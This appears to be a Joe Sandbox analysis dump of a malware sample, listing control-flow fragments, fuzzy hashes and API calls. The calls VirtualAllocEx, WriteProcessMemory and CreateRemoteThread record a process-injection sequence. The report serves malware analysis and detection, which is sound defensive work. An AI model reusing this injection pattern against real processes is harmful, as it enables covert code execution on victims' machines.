                                    control_flow_graph 49 18e18f0-18e18f5 50 18e18f7-18e1933 49->50 51 18e1880-18e1882 49->51 52 18e193b-18e1970 VirtualAllocEx 50->52 53 18e1884-18e18be 51->53 54 18e1805-18e182e 51->54 55 18e1979-18e1996 52->55 56 18e1972-18e1978 52->56 59 18e18c7-18e18e4 53->59 60 18e18c0-18e18c6 53->60 56->55 60->59
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 018E1963
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 99efaad7612683c04a11e0f84c83c8a21593b06ddb4715c4930da4bfe93b0a0b
                                    • Instruction ID: b652cb630512e50380cde321993b910f74e4a1742307c3744dc4798fa9945729
                                    • Opcode Fuzzy Hash: 99efaad7612683c04a11e0f84c83c8a21593b06ddb4715c4930da4bfe93b0a0b
                                    • Instruction Fuzzy Hash: 17419AB68002599FCB10DFA9D888ADEFFF4EF89324F10816AD558E7221C335A545CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 64 18e19b0-18e1a01 66 18e1a03-18e1a0f 64->66 67 18e1a11-18e1a4a WriteProcessMemory 64->67 66->67 68 18e1a4c-18e1a52 67->68 69 18e1a53-18e1a7b 67->69 68->69
                                    APIs
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 018E1A3D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: b6cf193e7d984084bb43a5b057befdf1715bde41244913e7ee9b330911c1f390
                                    • Instruction ID: de1ca8108beff7c2152091e3f2675a5ee52e4d5c10d65b5f0fabe2a2c841550b
                                    • Opcode Fuzzy Hash: b6cf193e7d984084bb43a5b057befdf1715bde41244913e7ee9b330911c1f390
                                    • Instruction Fuzzy Hash: 022105B1900259DFCB10CF99C889BDEBBF5FF49310F108429E958A7250D774A944CBA4

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 72 18e1d80-18e1e11 CreateRemoteThread 75 18e1e1a-18e1e37 72->75 76 18e1e13-18e1e19 72->76 76->75
                                    APIs
                                    • CreateRemoteThread.KERNEL32(?,?,?,?,?,?,?), ref: 018E1E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: CreateRemoteThread
                                    • String ID:
                                    • API String ID: 4286614544-0
                                    • Opcode ID: 0db11a4fe15c64a6461ff9288e6fa3a415bbfcca71b02a4d3dc3ac4714c9af7f
                                    • Instruction ID: c27007e3476eb5e3f531846a8991c8d827d8811179c6d8221d769db1c2eed284
                                    • Opcode Fuzzy Hash: 0db11a4fe15c64a6461ff9288e6fa3a415bbfcca71b02a4d3dc3ac4714c9af7f
                                    • Instruction Fuzzy Hash: 1B21F3B59002499FCB10CFAAC844ADEFFF5FF49320F14842AE958A7220D375A951CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 79 18e1d88-18e1e11 CreateRemoteThread 81 18e1e1a-18e1e37 79->81 82 18e1e13-18e1e19 79->82 82->81
                                    APIs
                                    • CreateRemoteThread.KERNEL32(?,?,?,?,?,?,?), ref: 018E1E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: CreateRemoteThread
                                    • String ID:
                                    • API String ID: 4286614544-0
                                    • Opcode ID: 586f562e07777a2cd224ea4ee09a8c011c5a0be6819ad2258be1722a106596c4
                                    • Instruction ID: 0abf0effd3b416fa242afbce58ea6fbb986fee7f79092d40134622e5753ed900
                                    • Opcode Fuzzy Hash: 586f562e07777a2cd224ea4ee09a8c011c5a0be6819ad2258be1722a106596c4
                                    • Instruction Fuzzy Hash: 6C2113B1900249DFCB10CF9AC848ADEFBF5FB48320F10842AE958A7220C375A950CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 85 18e18f8-18e1933 86 18e193b-18e1970 VirtualAllocEx 85->86 87 18e1979-18e1996 86->87 88 18e1972-18e1978 86->88 88->87
                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 018E1963
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707185381.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_FUDE.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: e5868743e930928b7cff5ff19bf65322c60b5a9256528ba90de1423accaafd63
                                    • Instruction ID: bd46c919631fedd3c0349f7c3482e064e96fbc673a4e73159c16a1db8f722588
                                    • Opcode Fuzzy Hash: e5868743e930928b7cff5ff19bf65322c60b5a9256528ba90de1423accaafd63
                                    • Instruction Fuzzy Hash: 9B1104B5900248DFCB10DF9AC848BDEFFF5EB89320F208419E558A7210C775A944CFA4
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7178eceb65dc6272a228df2e9b343ec498c5378d8c48b852e79fea540156588
                                    • Instruction ID: 848de86b8fafdfb4876ac002d83ec0e21e8330bd7d3e1c418423bb609b974dab
                                    • Opcode Fuzzy Hash: e7178eceb65dc6272a228df2e9b343ec498c5378d8c48b852e79fea540156588
                                    • Instruction Fuzzy Hash: 16F1B430A09A4D8FEBA8DF28C8557E937E1FF94350F04436AE84DC72A5DB34A9458B81
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5afa9ca25e3a70116bb65c93e3c24eec6a805503edc2f69e7a7e336abc2dc41d
                                    • Instruction ID: e72f952c732107cb0a5028b2d75d9abee88ef9a03730b51d3a0a785dd907bdf2
                                    • Opcode Fuzzy Hash: 5afa9ca25e3a70116bb65c93e3c24eec6a805503edc2f69e7a7e336abc2dc41d
                                    • Instruction Fuzzy Hash: 96E1C530A09A4E8FEBA8DF28C8557E977D1FF94350F04436ED84DC72A5CB78A9458B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %O_H
                                    • API String ID: 0-2286600916
                                    • Opcode ID: 3d2d40e90c7ceb4fb5d2fb753d619c4c20ea9fda44a197201d6c7966cec156e6
                                    • Instruction ID: 268ec6a00cc375b79cb87707ee24837755f36146bd7ef1bdf26edd7c4f230a49
                                    • Opcode Fuzzy Hash: 3d2d40e90c7ceb4fb5d2fb753d619c4c20ea9fda44a197201d6c7966cec156e6
                                    • Instruction Fuzzy Hash: 75C1F471B1DA1D4FD7A8EB6884B9AB477E1FFD8350B8106B8E04EC72F5CE24A9418740
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: d
                                    • API String ID: 0-2564639436
                                    • Opcode ID: fa2a522d55005c9c0b96c8a243048eed29c04a6e7544b0392eb04f284cd552fe
                                    • Instruction ID: 8dc53a314953983fe377fb2114b6188d898d2010bd9a6a9c5800c059c75d8d03
                                    • Opcode Fuzzy Hash: fa2a522d55005c9c0b96c8a243048eed29c04a6e7544b0392eb04f284cd552fe
                                    • Instruction Fuzzy Hash: E3210431D0935A4FEB209BA4C8556EDBBF0EF85350F0606BBD449D71A2CB2C694587A1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62d098c5544e0dd6ae1490579b80fa994935e5005c60408f417a8195ab9b7879
                                    • Instruction ID: 8349fc5f7b5c8dc1f724beaa213878e80f96f41d6d404cb8c7d296ef6a103e17
                                    • Opcode Fuzzy Hash: 62d098c5544e0dd6ae1490579b80fa994935e5005c60408f417a8195ab9b7879
                                    • Instruction Fuzzy Hash: D1A12872B19A490BE7A8A76C54396BDB6D1EFC8350F45477DE05EC32E6DE286C038340
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4027827bb96247cf5f23544515e98e23ebba2143b494f621949fb620025b5a0b
                                    • Instruction ID: b90e9cc6ec7328304abcdc3cb4b67e03f2f884f75927d3b4476cb3148b24e669
                                    • Opcode Fuzzy Hash: 4027827bb96247cf5f23544515e98e23ebba2143b494f621949fb620025b5a0b
                                    • Instruction Fuzzy Hash: AEA14961B1DB890BE7A8A76C44396B9BBD1FFC4350F4546BDE05EC72E6CE2868068340
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 268e66e492bb13e6f5d7dfbba77575d43a4592f44638c83c2d4d2ef822f0bdb4
                                    • Instruction ID: 7e6e72dad9c15df4d5ef848481d2e93733f4d6e93ff3e2efcc98fdb5278d79cc
                                    • Opcode Fuzzy Hash: 268e66e492bb13e6f5d7dfbba77575d43a4592f44638c83c2d4d2ef822f0bdb4
                                    • Instruction Fuzzy Hash: E7B1C53060DB4D4FEB68DF28C8557E93BE1EF55350F14436EE84DC72A2DA34A9458B82
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: df9126bdea5759463192aa97bcb2ef710eedd302d28694c8aca050a34ed492a2
                                    • Instruction ID: 6da9fb05756d406125b47f4fe01de17bde51ab0b9c0d6859b1e91c2a4cfe5de9
                                    • Opcode Fuzzy Hash: df9126bdea5759463192aa97bcb2ef710eedd302d28694c8aca050a34ed492a2
                                    • Instruction Fuzzy Hash: 53A18820B599494BE748B7BC947A7BDB2D2EFD8304F51427AE01DC32E6CD68AC418762
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 95c6cd5c081feb1e43f7f5917d93700666efa97d8628d3ad93d16ad8ea28ebd3
                                    • Instruction ID: a81683d164897aa4578c26f9e4ab1e11bdfeb205c7a70ac1a71c4732470ec33e
                                    • Opcode Fuzzy Hash: 95c6cd5c081feb1e43f7f5917d93700666efa97d8628d3ad93d16ad8ea28ebd3
                                    • Instruction Fuzzy Hash: 91715771F1DA0A4FE758EBB888656A5B7E0FF84350F4507B9D00DC71F6DE28A84A8381
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32f0902a2415345a2811731c5b95644d38e7b01c62af7983a07643da34bbedf2
                                    • Instruction ID: 18df4a6191b8d73003291dc9d2993dbf1f4e96674cbc3f8a68bc579a1edfaf4a
                                    • Opcode Fuzzy Hash: 32f0902a2415345a2811731c5b95644d38e7b01c62af7983a07643da34bbedf2
                                    • Instruction Fuzzy Hash: 5161E931B18A1C4FDB98EB689465BBDB7E1EF98350F450679D01ED32E2CE34AC418740
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70b5278ff01c39028f3978d54ff038df39e6c6b8a652c1bebc0d40b319efdfa7
                                    • Instruction ID: 674eed01695cc7c6acfb5a54d60a643e0498d0d540faa829feeaa0ce62718d3b
                                    • Opcode Fuzzy Hash: 70b5278ff01c39028f3978d54ff038df39e6c6b8a652c1bebc0d40b319efdfa7
                                    • Instruction Fuzzy Hash: 06712971A0D78D4FD725DBA8C8296B87FE0EF92360F0542BEC049C71E3DA246456C751
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43638a91f8ca3ac99a5df22ca0421ab5ac4133ef0c04cd47efaf37a805a012f3
                                    • Instruction ID: 65e3e318b107cd5804845197588f13ea304fd5e42608589a331fdb5492a3755e
                                    • Opcode Fuzzy Hash: 43638a91f8ca3ac99a5df22ca0421ab5ac4133ef0c04cd47efaf37a805a012f3
                                    • Instruction Fuzzy Hash: 4D212B22F0DBD90FD753A77858755E93FA0EF96250B0903F7D089C71A3DD1419098391
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d28b2345104259dd51468e9d913d1d313fb479615243258cecc2fa6cdb659c53
                                    • Instruction ID: f6d9c40d1692ad0dcb5f00599bf4694f61fd332782c1b051d35d36f65a447172
                                    • Opcode Fuzzy Hash: d28b2345104259dd51468e9d913d1d313fb479615243258cecc2fa6cdb659c53
                                    • Instruction Fuzzy Hash: F7512671B19A4E0FD798B7B894399AD7B91FFC86507800ABDE01EC32E6DD286905C340
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fcd5bc15c3a5637048b7ef9b704953e2e76eef1288bcc61d271a7a4a487db61e
                                    • Instruction ID: a6c1e8dbcf6e216c62a1fc788323311cb22609afc8a568c996156639299b21e6
                                    • Opcode Fuzzy Hash: fcd5bc15c3a5637048b7ef9b704953e2e76eef1288bcc61d271a7a4a487db61e
                                    • Instruction Fuzzy Hash: 44518230A18A0C4FDB98DF58D855BEDB7F1FF99310F1082AED44DD3296CA34A9468B81
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 524530b20c4bd331ce376f1ac45be0985bf6aa5ae6cecfc1980cc28fcd09a071
                                    • Instruction ID: 1ea99f24bced56f7e3f0f4c00685cf21608764d14e07626cae83124bfbe6e845
                                    • Opcode Fuzzy Hash: 524530b20c4bd331ce376f1ac45be0985bf6aa5ae6cecfc1980cc28fcd09a071
                                    • Instruction Fuzzy Hash: 1361EC2064F3C94FD75397789868AA47F91AF83365F0942FBE08CCA0F3DA95454AC742
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1485f3c0f841655bed54826c0fcd34b39300bf2126dd62f7dd46f9bf96ae9722
                                    • Instruction ID: 94cf0eed87469594dbf6f8c042b2746c8da5f5f1c56bfb64413ca41ec454b48f
                                    • Opcode Fuzzy Hash: 1485f3c0f841655bed54826c0fcd34b39300bf2126dd62f7dd46f9bf96ae9722
                                    • Instruction Fuzzy Hash: E6516330A18B1C8FDB58DF58D855BE9BBF1FB59310F0082AAD44DD3256DE34A9858F81
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4358609e310916b3d21142c73836168ac20ba1501854bd77fde71e335b63308
                                    • Instruction ID: d770b7d12d9ce8dc3832299eb1c6b3d1b523ddf06dfcb6e2d3295e5fa65cd6f1
                                    • Opcode Fuzzy Hash: f4358609e310916b3d21142c73836168ac20ba1501854bd77fde71e335b63308
                                    • Instruction Fuzzy Hash: 3B510A22B0DA490FE748AB7C987A6B877D1EFC5255B0502BBE05DC71E7DE18AC0A8341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 000c880107dc62ba40866dc0e7a2f27aaaa9cb37e842a8bc92cc74cac5d50380
                                    • Instruction ID: b9fbbc97e731cc24cc1386386118852424537a8c0992ce7845a1cc44c72cb43b
                                    • Opcode Fuzzy Hash: 000c880107dc62ba40866dc0e7a2f27aaaa9cb37e842a8bc92cc74cac5d50380
                                    • Instruction Fuzzy Hash: DA51A430B19A1D9FDB98EB68D465AAD73E1FF88340F410375E00ED32A6DE35A9458741
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8b9cf1fab74ce05abf48bfb1e352645d629a55f70feac879bb9c02f36515a840
                                    • Instruction ID: aef59764d035ee0366998cd19b6b8a381be89c4df47337496c7b3d90d63fd42e
                                    • Opcode Fuzzy Hash: 8b9cf1fab74ce05abf48bfb1e352645d629a55f70feac879bb9c02f36515a840
                                    • Instruction Fuzzy Hash: 0E416C21B1DA490FE7A4B73C542A9B977C2DFC5750B050679E44DC32E6DD29AC438341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d964fc7ffe3c0c641177e7581e07423fcdea3285a90aa771aa6b251e220bc3d
                                    • Instruction ID: ecea73a72a31e7631a22f78fd356ef6ef1e0b2332d4b2c7edc571a522d53d183
                                    • Opcode Fuzzy Hash: 9d964fc7ffe3c0c641177e7581e07423fcdea3285a90aa771aa6b251e220bc3d
                                    • Instruction Fuzzy Hash: 46511430A0D78A4FE716D77444226A47FA0EF92360F1903E9D09DC71F3CE28A846C751
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 29f8ea44a5aa1bbec02b05f7621810ef79fdb9c5e0a4b05378246cbc929100f5
                                    • Instruction ID: 86904846ce1cd06ff1ef4b86ae79c3c4ec6722cc51ed89d4ae9b0b2c46fe37d3
                                    • Opcode Fuzzy Hash: 29f8ea44a5aa1bbec02b05f7621810ef79fdb9c5e0a4b05378246cbc929100f5
                                    • Instruction Fuzzy Hash: C851BB62F0F6C64BE725A7E858394B87F50FFD269078943FAC0984B2F7DD046A19C681
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 575f150092aae1f6ee9fd90a2ca1396f7a50c684af443d7b1cac3f19cf3ec97f
                                    • Instruction ID: d66708e77b5436b3e812600d72290d2d7b6a238855ecdb900fa8176bc5d98e46
                                    • Opcode Fuzzy Hash: 575f150092aae1f6ee9fd90a2ca1396f7a50c684af443d7b1cac3f19cf3ec97f
                                    • Instruction Fuzzy Hash: A9416F74609A5D8FDBA8EFA8D469AA97BF0FF55301F40017ED00AD36A1CB75A841CB41
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ed1f95640e9f9ba99a71589ab332595ccd845ffc1f81e81ce0f6df07104db8ef
                                    • Instruction ID: d3ba47aef985b6d08fa3b007a58fb703ac5b90807b4e56af95ff33a56d065687
                                    • Opcode Fuzzy Hash: ed1f95640e9f9ba99a71589ab332595ccd845ffc1f81e81ce0f6df07104db8ef
                                    • Instruction Fuzzy Hash: 4F41D521B0DA890FE785AB7C58796787BD2DF8A215F0902FBE04DC72E7DD689C068341
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 29819279519c6eb02d80aa5f264d035b4ae4d3d27d88969cdd41130cfc5062c3
                                    • Instruction ID: 01ea700b1ec253e58e9b93c93690da75191231bdadd119328a0d37569a66c58d
                                    • Opcode Fuzzy Hash: 29819279519c6eb02d80aa5f264d035b4ae4d3d27d88969cdd41130cfc5062c3
                                    • Instruction Fuzzy Hash: 9C11D662B0DBD90FD752A77858355E97FB0EF96250B0902F7D059C31A3DA142D058792
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e20894761ea52bb819ca4f2f4022c9312c6a73bfbce00584f0d69fc7e85ebe9
                                    • Instruction ID: 9248c2f7e6e1495fed10520f305c760a928dc936cf7e66e15552603fd7ef0deb
                                    • Opcode Fuzzy Hash: 0e20894761ea52bb819ca4f2f4022c9312c6a73bfbce00584f0d69fc7e85ebe9
                                    • Instruction Fuzzy Hash: 1611E322B0DB9D0FD752E76858396A97BB0EF86250B0902F7E05DC31E3CA142D088392
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50d31974a7127f626031df8826f5121f0bf77e423fda4dac2a6c6d810670a876
                                    • Instruction ID: 67e46e075ff1438b6c8e5958f4b262c3a8d05ea206a2b044d260ad5655d28065
                                    • Opcode Fuzzy Hash: 50d31974a7127f626031df8826f5121f0bf77e423fda4dac2a6c6d810670a876
                                    • Instruction Fuzzy Hash: C5416F74609A1D8FDBA8EF98D469AB97BE0FF55301F50027ED00ED36A1CB35A841CB41
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e967a1efc0fa6aa27f8d7dc4b67072089b67b2ed02345a364bb04db087406621
                                    • Instruction ID: ce6706b8e479478f28d3f248ae92cc1581d6c367a6926835da40ae3bfc26aa4e
                                    • Opcode Fuzzy Hash: e967a1efc0fa6aa27f8d7dc4b67072089b67b2ed02345a364bb04db087406621
                                    • Instruction Fuzzy Hash: 8D413921B1DA890FE7A5B77C443A6793BD2DFC6250B0902BAD08DC71E7DD1DAC468352
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b7d0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba28c237204711804cb36a1c10e673fc40319d9bbe7f7bd17b72c62e22ac95a7
                                    • Instruction ID: 6ba24a70213093bb406916344d5f33309b919ace660cef78d963850ff3e04a45
                                    • Opcode Fuzzy Hash: ba28c237204711804cb36a1c10e673fc40319d9bbe7f7bd17b72c62e22ac95a7
                                    • Instruction Fuzzy Hash: B6411431B0D60C4FEB64E778986AAF937E1FF85360F4502BAD41DC71E2DE28A8168740
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4146870150.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
